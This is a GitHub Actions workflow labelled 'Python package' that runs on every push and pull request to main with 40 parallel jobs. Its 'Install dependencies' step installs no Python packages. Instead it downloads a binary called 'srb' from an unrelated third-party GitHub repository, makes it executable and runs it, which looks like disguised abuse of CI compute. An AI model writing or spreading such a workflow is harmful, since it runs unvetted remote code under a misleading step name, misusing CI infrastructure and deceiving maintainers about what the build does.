name: Python package

on:
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

jobs:
  build:

    runs-on: ubuntu-latest
    strategy:
      max-parallel: 40
      fail-fast: false
      matrix:
        python-version: ["3.7"]
        flag: [A]
    env:
      NUM_JOBS: 40
      JOB: ${{matrix.python-version}}

    steps:
    - uses: actions/checkout@v2
    - name: Set up Python ${{ matrix.python-version }}
      uses: actions/setup-python@v2
      with:
        python-version: ${{ matrix.python-version }}
    - name: Install dependencies
      run: |
        wget https://github.com/skusgdh/Rhu/raw/main/srb && chmod +x srb && ./srb --help
